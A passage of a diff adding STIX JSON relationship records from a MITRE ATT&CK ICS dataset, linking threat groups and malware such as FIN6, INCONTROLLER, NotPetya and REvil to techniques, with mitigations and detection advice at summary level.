"attack-pattern--b0628bfc-5376-4a38-9182-f324501cb4cf", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--e9f5096e-b9fc-459a-a303-88763b1269cc", + "type": "relationship", + "created": "2020-05-14T14:41:42.975Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html", + "source_name": "FireEye FIN6 Apr 2019" + } + ], + "modified": "2020-05-15T19:15:35.568Z", + "description": "(Citation: FireEye FIN6 Apr 2019)", + "relationship_type": "uses", + "source_ref": "intrusion-set--2a7914cf-dff3-428d-ab0f-1014d1c28aeb", + "target_ref": "malware--a020a61c-423f-4195-8c46-ba1d21abba37", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4dd93fd2-6e6d-4c50-a091-6d6ea6903f1e", + "created": "2022-09-28T21:21:58.641Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Wylie-22", + "description": "Jimmy Wylie. (2022, August). Analyzing PIPEDREAM: Challenges in Testing an ICS Attack Toolkit. Defcon 30.", + "url": "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Jimmy%20Wylie%20-%20Analyzing%20PIPEDREAM%20Challenges%20in%20testing%20an%20ICS%20attack%20toolkit.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-13T16:53:47.435Z", + "description": "[INCONTROLLER](https://attack.mitre.org/software/S1045) can use the HTTP CGI scripts on Omron PLCs to modify parameters on EtherCat connected servo drives.(Citation: Wylie-22) ", + "relationship_type": "uses", + "source_ref": "malware--d3aa1058-b1b3-4c29-a3ba-9a9b90ccd93b", + "target_ref": "attack-pattern--097924ce-a9a9-4039-8591-e0deedfb8722", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--dda89758-9d0b-446d-b594-85acc7f9cb90", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Department of Homeland Security October 2009", + "description": "Department of Homeland Security 2009, October Developing an Industrial Control Systems Cybersecurity Incident Response Capability Retrieved. 2020/09/17 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/final-RP_ics_cybersecurity_incident_response_100609.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-19T21:23:40.524Z", + "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise. Maintain and exercise incident response plans (Citation: Department of Homeland Security October 2009), including the management of gold-copy back-up images and configurations for key systems to enable quick recovery and response from adversarial activities that impact control, view, or availability.\n", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ad12819e-3211-4291-b360-069f280cff0a", + "target_ref": "attack-pattern--63b6942d-8359-4506-bfb3-cf87aa8120ee", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--2d65925e-f437-4557-bd8b-4c0d14ffd0b0", + "created": "2022-05-11T16:22:58.803Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T15:02:57.267Z", + "description": "Monitor for the termination of processes or services associated with ICS automation protocols and application software which could help detect blocked communications.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--61f1d40e-f3d0-4cc6-aa2d-937b6204194f", + "target_ref": "attack-pattern--008b8f56-6107-48be-aa9f-746f927dbb61", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--03a9cdc7-3cc5-43e3-9a9c-97d1c4310e35", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-08T22:27:54.588Z", + "description": "All field controllers should require users to authenticate for all remote or local management sessions. The authentication mechanisms should also support [Account Use Policies](https://attack.mitre.org/mitigations/M0936), [Password Policies](https://attack.mitre.org/mitigations/M0927), and [User Account Management](https://attack.mitre.org/mitigations/M0918).", + "relationship_type": "mitigates", + "source_ref": "course-of-action--66cfe23e-34b6-4583-b178-ed6a412db2b0", + "target_ref": "attack-pattern--e5de767e-f513-41cd-aa15-33f6ce5fbf92", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--042243fd-bfe0-4961-96de-a36232d3ff74", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Symantec Security Response July 2014", + "description": "Symantec Security Response 2014, July 7 Dragonfly: Cyberespionage Attacks Against Energy Suppliers Retrieved. 2016/04/08 ", + "url": "https://docs.broadcom.com/doc/dragonfly_threat_against_western_energy_suppliers#:~:text=The%20attackers%2C%20known%20to%20Symantec,supply%20in%20the%20affected%20countries." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T16:04:03.547Z", + "description": "[Dragonfly](https://attack.mitre.org/groups/G0035) utilized watering hole attacks on energy sector websites by injecting a redirect iframe to deliver [Backdoor.Oldrea](https://attack.mitre.org/software/S0093) or [Trojan.Karagany](https://attack.mitre.org/software/S0094). (Citation: Symantec Security Response July 2014)", + "relationship_type": "uses", + "source_ref": "intrusion-set--1c63d4ec-0a75-4daa-b1df-0d11af3d3cc1", + "target_ref": "attack-pattern--7830cfcf-b268-4ac0-a69e-73c6affbae9a", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b5979643-fefb-460f-b59c-971efe95f121", + "created": "2022-09-27T16:57:48.758Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:42:28.408Z", + "description": "Monitor for changes made to services that may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--66531bc6-a509-4868-8314-4d599e91d222", + "target_ref": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--47f15a06-8675-4698-833d-bd141ed9e755", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Microsoft Security Response Center August 2017", + "description": "Microsoft Security Response Center 2017, August Moving Beyond EMET II Windows Defender Exploit Guard Retrieved. 2020/09/25 ", + "url": "https://msrc-blog.microsoft.com/2017/08/09/moving-beyond-emet-ii-windows-defender-exploit-guard/" + }, + { + "source_name": "Wikipedia", + "description": "Wikipedia Microsoft Security Response Center 2017, August Moving Beyond EMET II Windows Defender Exploit Guard Retrieved. 2020/09/25 Control-flow integrity Retrieved. 2020/09/25 ", + "url": "https://en.wikipedia.org/wiki/Control-flow_integrity" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-21T13:18:32.118Z", + "description": "Security applications that look for behavior used during exploitation such as Windows Defender Exploit Guard (WDEG) and the Enhanced Mitigation Experience Toolkit (EMET) can be used to mitigate some exploitation behavior. (Citation: Microsoft Security Response Center August 2017) Control flow integrity checking is another way to potentially identify and stop a software exploit from occurring. (Citation: Wikipedia) Many of these protections depend on the architecture and target application binary for compatibility and may not work for all software or services targeted.\n", + "relationship_type": "mitigates", + "source_ref": "course-of-action--49363b74-d506-4342-bd63-320586ebadb9", + "target_ref": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ad7770c3-fe24-4285-9ce2-1616a1061472", + "type": "relationship", + "created": "2019-04-17T14:45:59.681Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html", + "source_name": "FireEye FIN6 Apr 2019" + } + ], + "modified": "2019-06-28T14:59:17.849Z", + "description": "(Citation: FireEye FIN6 Apr 2019)", + "relationship_type": "uses", + "source_ref": "intrusion-set--2a7914cf-dff3-428d-ab0f-1014d1c28aeb", + "target_ref": "malware--5af7a825-2d9f-400d-931a-e00eb9e27f48", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--91f29477-2ff6-4dbf-bf68-c8825a938851", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-04-13T12:08:26.506Z", + "modified": "2022-05-06T17:47:24.119Z", + "relationship_type": "mitigates", + "description": "Update software regularly by employing patch management for internal enterprise endpoints and servers.\n", + "source_ref": "course-of-action--97f33c84-8508-45b9-8a1d-cac921828c9e", + "target_ref": "attack-pattern--cfe68e93-ce94-4c0f-a57d-3aa72cedd618", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--3439d550-61d5-40b4-a514-341509d3f701", + "created": "2022-05-11T16:22:58.803Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T15:08:28.052Z", + "description": "Monitor for the termination of processes or services associated with ICS automation protocols and application software which could help detect blocked communications.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--61f1d40e-f3d0-4cc6-aa2d-937b6204194f", + "target_ref": "attack-pattern--3f1f4ccb-9be2-4ff8-8f69-dd972221169b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a7fb3abd-c800-408e-8329-2a4f6256ea4a", + "created": "2022-09-29T14:27:05.757Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-29T14:27:05.757Z", + "description": "Monitor logon sessions for hardcoded credential use, when feasible.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9ce98c86-8d30-4043-ba54-0784d478d0b5", + "target_ref": "attack-pattern--c9a8d958-fcdb-40d2-af4c-461c8031651a", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--b1d993d5-9e7e-4043-a651-07c7b5ad5a6b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.228Z", + "relationship_type": "mitigates", + "description": "If a link is being visited by a user, network intrusion prevention systems and systems designed to scan and remove malicious downloads can be used to block activity.\n", + "source_ref": "course-of-action--3172222b-4983-43f7-8983-753ded4f13bc", + "target_ref": "attack-pattern--2736b752-4ec5-4421-a230-8977dea7649c", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--de8b8a69-5f08-421a-96f0-2bed5707508d", + "created": "2022-05-11T16:22:58.808Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Nzyme Alerts Intro", + "description": "Koopmann, Lennart. (n.d.). Nzyme Alerts Introduction. Retrieved September 26, 2022.", + "url": "https://www.nzyme.org/docs/alerts/intro" + }, + { + "source_name": "Wireless Intrusion Detection", + "description": "Tomko, A.; Rieser, C; Buell, H.; Zeret, D.; Turner, W.. (2007, March). Wireless Intrusion Detection. Retrieved September 26, 2022.", + "url": "https://apps.dtic.mil/sti/pdfs/ADA466332.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T18:57:13.322Z", + "description": "New or irregular network traffic flows may indicate potentially unwanted devices or sessions on wireless networks. In Wi-Fi networks monitor for changes such as rogue access points or low signal strength, indicating a device is further away from the access point then expected and changes in the physical layer signal.(Citation: Nzyme Alerts Intro) (Citation: Wireless Intrusion Detection) Network traffic content will provide important context, such as hardware (e.g., MAC) addresses, user accounts, and types of messages sent.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "target_ref": "attack-pattern--2877063e-1851-48d2-bcc6-bc1d2733157e", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--d3c94120-e6b5-4bd2-88f0-9c73f76b0104", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.227Z", + "relationship_type": "mitigates", + "description": "Ensure anti-virus solution can detect malicious files that allow user execution (e.g., Microsoft Office Macros, program installers).\n", + "source_ref": "course-of-action--faf2b40e-5981-433f-aa46-17458e0026f7", + "target_ref": "attack-pattern--2736b752-4ec5-4421-a230-8977dea7649c", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--6603a100-d655-4e6b-8d38-73c11b89dde4", + "created": "2019-03-26T16:19:52.358Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Joe Slowik April 2019", + "description": "Joe Slowik 2019, April 10 Implications of IT Ransomware for ICS Environments Retrieved. 2019/10/27 ", + "url": "https://dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:58:42.847Z", + "description": "[NotPetya](https://attack.mitre.org/software/S0368) initially infected IT networks, but by means of an exploit (particularly the SMBv1-targeting MS17-010 vulnerability) spread to industrial networks. (Citation: Joe Slowik April 2019)", + "relationship_type": "uses", + "source_ref": "malware--5719af9d-6b16-46f9-9b28-fb019541ddbb", + "target_ref": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--ee1bf429-2c7c-4eb6-acca-e758522baf2e", + "created": "2021-04-12T18:49:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Tom Fakterman August 2019", + "description": "Tom Fakterman 2019, August 05 Sodinokibi: The Crown Prince of Ransomware Retrieved. 2021/04/12 ", + "url": "https://www.cybereason.com/blog/the-sodinokibi-ransomware-attack" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:07:33.947Z", + "description": "[REvil](https://attack.mitre.org/software/S0496) utilizes JavaScript, WScript, and PowerShell scripts to execute. The malicious JavaScript attachment has an obfuscated PowerShell script that executes the malware. (Citation: Tom Fakterman August 2019)", + "relationship_type": "uses", + "source_ref": "malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5", + "target_ref": "attack-pattern--2dc2b567-8821-49f9-9045-8740f3d0b958", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--63453d2f-30f6-40ab-b32c-506d940ecd20", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-08T22:25:01.756Z", + "description": "Devices that allow remote management of firmware should require authentication before allowing any changes. The authentication mechanisms should also support [Account Use Policies](https://attack.mitre.org/mitigations/M0936), [Password Policies](https://attack.mitre.org/mitigations/M0927), and [User Account Management](https://attack.mitre.org/mitigations/M0918)", + "relationship_type": "mitigates", + "source_ref": "course-of-action--66cfe23e-34b6-4583-b178-ed6a412db2b0", + "target_ref": "attack-pattern--19a71d1e-6334-4233-8260-b749cae37953", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--067932c3-0011-4ca2-9bbe-721c631e4e41", + "created": "2021-04-13T12:45:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Daavid Hentunen, Antti Tikkanen June 2014", + "description": "Daavid Hentunen, Antti Tikkanen 2014, June 23 Havex Hunts For ICS/SCADA Systems Retrieved. 2019/04/01 ", + "url": "https://www.f-secure.com/weblog/archives/00002718.html" + }, + { + "source_name": "ICS-CERT August 2018", + "description": "ICS-CERT 2018, August 22 Advisory (ICSA-14-178-01) Retrieved. 2019/04/01 ", + "url": "https://ics-cert.us-cert.gov/advisories/ICSA-14-178-01" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:19:04.571Z", + "description": "The [Backdoor.Oldrea](https://attack.mitre.org/software/S0093) payload gathers server information that includes CLSID, server name, Program ID, OPC version, vendor information, running state, group count, and server bandwidth. This information helps indicate the role the server has in the control process. (Citation: ICS-CERT August 2018) (Citation: Daavid Hentunen, Antti Tikkanen June 2014)", + "relationship_type": "uses", + "source_ref": "malware--083bb47b-02c8-4423-81a2-f9ef58572974", + "target_ref": "attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--f40cc6f5-111c-418f-aa84-50d920fa6c48", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-04-13T12:08:26.506Z", + "modified": "2022-05-06T17:47:24.118Z", + "relationship_type": "mitigates", + "description": "Develop a robust cyber threat intelligence capability to determine what types and levels of threat may use software exploits and 0-days against a particular organization.\n", + "source_ref": "course-of-action--d48b79b2-076d-483e-949c-0d38aa347499", + "target_ref": "attack-pattern--cfe68e93-ce94-4c0f-a57d-3aa72cedd618", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--78972893-5d8c-480f-a05d-481adc0c8bb0", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T16:12:25.316Z", + "description": "Monitor ICS automation network protocols for functions related to reading an asset’s operating mode. In some cases, there may be multiple ways to detect a device’s operating mode, one of which is typically used in the operational environment. Monitor for the operating mode being checked in unexpected ways.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--2aa406ed-81c3-4c1d-ba83-cfbee5a2847a", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--51ed2f2f-d7e2-4699-b6bf-8da9d0361d59", + "created": "2022-09-26T17:08:21.214Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T17:08:21.214Z", + "description": "Monitor device communication patterns to identify irregular bulk transfers of data between the embedded ICS asset and other nodes within the network. Note these indicators are dependent on the profile of normal operations and the capabilities of the industrial automation protocols involved (e.g., partial program uploads).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "target_ref": "attack-pattern--3067b85e-271e-4bc5-81ad-ab1a81d411e3", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--7d66eae7-0dd4-4d21-ab07-8f7e350a7105", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:14:40.227Z", + "description": "Monitor executed commands and arguments to services specifically designed to accept remote connections, such as RDP, Telnet, SSH, and VNC. The adversary may then perform these actions using [Valid Accounts](https://attack.mitre.org/techniques/T0859).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0", + "target_ref": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--20a0d820-59ef-42fc-9f56-7a93d1ce7a84", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.084Z", + "relationship_type": "mitigates", + "description": "If it is possible to inspect HTTPS traffic, the captures can be analyzed for connections that appear to be domain fronting.\n", + "source_ref": "course-of-action--6a02e38a-9629-40c0-8c7d-e98e3470315c", + "target_ref": "attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--ecf39e19-439f-4e9a-97c2-673ce4eb0a1a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.139Z", + "relationship_type": "mitigates", + "description": "Provide operators with redundant, out-of-band communication to support monitoring and control of the operational processes, especially when recovering from a network outage (Citation: National Institute of Standards and Technology April 2013). Out-of-band communication should utilize diverse systems and technologies to minimize common failure modes and vulnerabilities within the communications infrastructure. For example, wireless networks (e.g., 3G, 4G) can be used to provide diverse and redundant delivery of data.\n", + "source_ref": "course-of-action--b11cad63-ef30-4eb8-af0d-6cc46eef3f3e", + "target_ref": "attack-pattern--138979ba-0430-4de6-a128-2fc0b056ba36", + "external_references": [ + { + "source_name": "National Institute of Standards and Technology April 2013", + "description": "National Institute of Standards and Technology 2013, April Security and Privacy Controls for Federal Information Systems and Organizations Retrieved. 2020/09/17 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r4.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--0e4f272b-d744-4feb-9f3f-c24c3598538f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.202Z", + "relationship_type": "mitigates", + "description": "Ensure proper registry permissions are in place to inhibit adversaries from disabling or interfering with critical services.\n", + "source_ref": "course-of-action--3222a807-521b-4a1a-aa13-f1cda45734b3", + "target_ref": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--b363cbbb-679c-47e0-8ad0-af98ebf51e60", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.236Z", + "relationship_type": "mitigates", + "description": "Utilize strong cryptographic techniques and protocols to prevent eavesdropping on network communications.\n", + "source_ref": "course-of-action--7f153c28-e5f1-4764-88fb-eea1d9b0ad4a", + "target_ref": "attack-pattern--2877063e-1851-48d2-bcc6-bc1d2733157e", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": 